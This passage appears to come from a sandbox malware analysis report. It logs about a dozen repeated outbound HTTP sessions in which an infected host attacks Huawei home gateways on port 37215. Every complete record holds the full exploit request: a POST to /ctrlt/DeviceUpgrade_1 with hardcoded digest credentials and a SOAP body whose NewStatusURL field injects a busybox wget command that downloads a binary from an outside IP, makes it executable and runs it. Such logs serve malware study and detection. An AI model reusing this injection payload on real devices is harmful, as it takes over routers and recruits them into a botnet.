2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            139192.168.2.1549630197.159.164.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176115036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            140192.168.2.1547164197.194.195.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176131964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            141192.168.2.1554714197.46.41.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176183939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            142192.168.2.1543356197.126.77.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176219940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            143192.168.2.1538136197.22.86.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176219940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            144192.168.2.1553580197.103.125.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176258087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            145192.168.2.1534094197.164.85.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176275015 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            146192.168.2.1538512197.72.123.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176295996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            147192.168.2.1540940197.252.229.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176315069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            148192.168.2.1547416197.19.54.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176337957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            149192.168.2.1541540197.28.228.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.176354885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
